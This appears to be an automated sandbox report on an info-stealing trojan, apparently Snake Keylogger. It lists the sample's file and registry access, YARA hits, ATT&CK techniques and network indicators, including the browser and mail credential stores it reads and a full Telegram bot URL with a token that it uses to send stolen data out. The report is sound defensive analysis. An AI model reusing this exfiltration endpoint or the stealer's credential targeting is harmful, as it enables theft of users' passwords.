              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeQueries volume information: C:\Users\user\Desktop\rPO0977-6745.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeQueries volume information: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeQueries volume information: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\rPO0977-6745.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000017.00000002.3693041192.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3693243826.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3693243826.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.3693041192.00000000029EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR
              Source: Yara matchFile source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\rPO0977-6745.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000017.00000002.3693041192.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3693243826.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3693243826.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.3693041192.00000000029EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR
              Source: Yara matchFile source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              File and Directory Discovery
              Remote Services11
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scheduled Task/Job
              111
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory13
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Scheduled Task/Job
              31
              Obfuscated Files or Information
              Security Account Manager11
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
              Software Packing
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp
              LSA Secrets31
              Virtualization/Sandbox Evasion
              SSHKeylogging14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading
              DCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
              Virtualization/Sandbox Evasion
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
              Process Injection
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480082 Sample: rPO0977-6745.exe Startdate: 24/07/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 3 other IPs or domains 2->50 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Sigma detected: Scheduled temp file as task from temp location 2->62 68 10 other signatures 2->68 8 rPO0977-6745.exe 7 2->8         started        12 EDyxAgkldisLe.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\...DyxAgkldisLe.exe, PE32 8->38 dropped 40 C:\...DyxAgkldisLe.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp44AD.tmp, XML 8->42 dropped 44 C:\Users\user\...\rPO0977-6745.exe.log, ASCII 8->44 dropped 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Adds a directory exclusion to Windows Defender 8->72 74 Injects a PE file into a foreign processes 8->74 14 rPO0977-6745.exe 15 2 8->14         started        18 powershell.exe 22 8->18         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 76 Multi AV Scanner detection for dropped file 12->76 78 Machine Learning detection for dropped file 12->78 22 EDyxAgkldisLe.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 52 api.telegram.org 149.154.167.220, 443, 49735, 49741 TELEGRAMRU United Kingdom 14->52 54 reallyfreegeoip.org 188.114.97.3, 443, 49704, 49705 CLOUDFLARENETUS European Union 14->54 56 checkip.dyndns.com 158.101.44.242, 49702, 49706, 49709 ORACLE-BMC-31898US United States 14->56 80 Loading BitLocker PowerShell Module 18->80 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        82 Tries to steal Mail credentials (via file / registry access) 22->82 84 Tries to harvest and steal browser information (history, passwords, etc) 22->84 34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              rPO0977-6745.exe45%ReversingLabsWin32.Trojan.Generic
              rPO0977-6745.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe45%ReversingLabsWin32.Trojan.Generic
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://checkip.dyndns.org/0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
              http://checkip.dyndns.org/q0%URL Reputationsafe
              http://reallyfreegeoip.org0%URL Reputationsafe
              https://reallyfreegeoip.org0%URL Reputationsafe
              http://checkip.dyndns.org0%URL Reputationsafe
              http://checkip.dyndns.com0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/0%URL Reputationsafe
              https://api.telegram.org/bot0%Avira URL Cloudsafe
              https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake0%Avira URL Cloudsafe
              http://microsoft.co0%Avira URL Cloudsafe
              https://api.telegram.org0%Avira URL Cloudsafe
              http://checkip.dyndns.orgh0%Avira URL Cloudsafe
              https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=55350%Avira URL Cloudsafe
              http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
              http://api.telegram.org0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              188.114.97.3
              truetrue
                unknown
                api.telegram.org
                149.154.167.220
                truetrue
                  unknown
                  checkip.dyndns.com
                  158.101.44.242
                  truefalse
                    unknown
                    15.164.165.52.in-addr.arpa
                    unknown
                    unknowntrue
                      unknown
                      checkip.dyndns.org
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snakefalse
                        • Avira URL Cloud: safe
                        unknown
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        unknown
                        https://reallyfreegeoip.org/xml/8.46.123.33false
                        • URL Reputation: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.telegram.orgrPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://api.telegram.org/botEDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
